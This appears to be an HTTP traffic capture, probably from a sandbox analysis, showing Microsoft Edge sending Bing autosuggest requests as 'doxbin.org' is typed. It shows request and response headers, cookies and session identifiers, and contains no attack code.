useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-CsuNqEoaTDkY+b1BfEUWQuzFrDcmuoKFvSjwzkJA/cs='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:37 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:37 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=13EB2A274089602121263F6C41AE6100; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:37 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306917.7f17a72
GET

https://www.bing.com/qbox?query=doxbinor&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=f79fa214d9aa4cd08dd8890460bf3de2&oit=1&cp=8&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=doxbinor&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=f79fa214d9aa4cd08dd8890460bf3de2&oit=1&cp=8&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 221
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a2558b84a1c95939f16a891c742
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-rGNkFxI6W7h0r1oBCNNQ4oOb4Hr47U8icVWngOadQac='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:37 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:37 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=3DCEB591AA1C6F9A1F32A0DAAB4A6E6C; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:37 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306917.7f17b16
GET

https://www.bing.com/qbox?query=doxbino&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=5ac21664b75840c2825cc45b4a31af24&oit=1&cp=7&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=doxbino&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=5ac21664b75840c2825cc45b4a31af24&oit=1&cp=7&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 261
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a2547b24abf83ebb81ffb8ab443
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-3F+ErxmW7UNP4Oa28+NS2lgWfyiDOfOHraq/+bFB+Yc='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:37 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:37 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=34966385C4E8634A179876CEC521622D; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:37 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306917.7f17bdd
GET

https://www.bing.com/qbox?query=doxbin&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=0bf26158462c4de686453cccf227419c&oit=1&cp=6&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=doxbin&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=0bf26158462c4de686453cccf227419c&oit=1&cp=6&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 227
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a26ac324e779aa10734ed073bca
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-wvtmVEUamNpb1tzkUmfX4RNn+hF1U3ZdK7jyVI0Yihc='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:38 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:38 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=3BEC783A17DE6B1116826D7116396A3F; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:38 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306918.7f17f9f
GET

https://www.bing.com/qbox?query=doxbin.&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=52e6a0a09641422d907124749137fcfb&oit=1&cp=7&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=doxbin.&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=52e6a0a09641422d907124749137fcfb&oit=1&cp=7&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 157
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a2601654b2781245b7ac83d86ab
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-bZlL9ORAnw/2Vsy8go8qHm5PL3PqklHDs7mAJ/SrU3M='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:38 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:38 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=12C48106BF836C0A20FF944DBE7D6DE8; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:38 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306918.7f180ef
GET

https://www.bing.com/qbox?query=doxbin.o&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=0402ebae98f34ade8dd2200a5c81b00d&oit=1&cp=8&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=doxbin.o&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=0402ebae98f34ade8dd2200a5c81b00d&oit=1&cp=8&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 158
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a27841e40e6ac383014efb98bcb
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Twbpd62Qn1TsGZ1wIwoDvwEmcmqeUEnYdLddsYVaLv8='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:39 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:39 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=28DFBD9412466E6F184EA8DF136C6FB5; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:39 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306919.7f18199
GET

https://www.bing.com/qbox?query=doxbin.or&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=489cef14ffc046268cd830ae6284f266&oit=1&cp=9&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=doxbin.or&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=489cef14ffc046268cd830ae6284f266&oit=1&cp=9&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 159
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a27f6344590a63e0ecca051f0f8
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-WR70b5SD7OPf8IgOuGLkjWIfczDCRPyDtVj1x8Uthmo='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:39 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:39 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=12CA2D2968196DD3291C3862694B6C6B; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:39 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306919.7f18254
GET

https://www.bing.com/qbox?query=doxbin.org&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=ab3a2201501147c59fac06d88bda929d&oit=3&cp=10&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=doxbin.org&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=ab3a2201501147c59fac06d88bda929d&oit=3&cp=10&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:39 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306919.7f1834c
POST

